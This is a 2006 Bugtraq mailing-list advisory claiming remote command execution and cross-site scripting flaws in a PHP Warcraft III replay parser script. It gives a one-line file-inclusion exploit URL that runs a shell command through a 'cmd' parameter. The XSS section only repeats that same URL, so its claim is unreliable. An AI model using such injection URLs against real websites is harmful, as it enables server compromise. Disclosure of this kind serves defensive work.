Warcraft III Replay Parser Script Remote Command Exucetion Vulnerability And Cross-Site Scripting Attacking

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Warcraft III Replay Parser Script Remote Command Exucetion Vulnerability And Cross-Site Scripting Attacking
From: botan@xxxxxxxxxxxxx
Date: 31 Mar 2006 19:34:40 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Website : http://toya.net.pl/~julas/w3g/
Version : 1.8c 

Description :

Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not 
that Warcraft III replay files (*.w3g) have much information inside. Almost 
everything can be pulled out of them: players accounts, races, colours, heroes 
and units made by each player, chat log and many more. If you are a webmaster 
of Warcraft III replay site or clan page you know how boring adding new replays 
can be without automation. This PHP script helps you provide as much 
information about replays on your site as possible without all the hard work. * 

I. Remote Command Exucetion ..

Yolumuz agitlerin yoludur.!

http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

2.XSS Attacking

http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

Solution : up version :)

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

14'ler Ölümsüzdür.

Prev by Date: Buffer-overflow and in-game crash in Zdaemon 1.08.01
Next by Date: Mis-diagnosed XSS bugs hiding worse issues due to PHP feature
Previous by thread: Buffer-overflow and in-game crash in Zdaemon 1.08.01
Next by thread: Mis-diagnosed XSS bugs hiding worse issues due to PHP feature
Index(es):
- Date
- Thread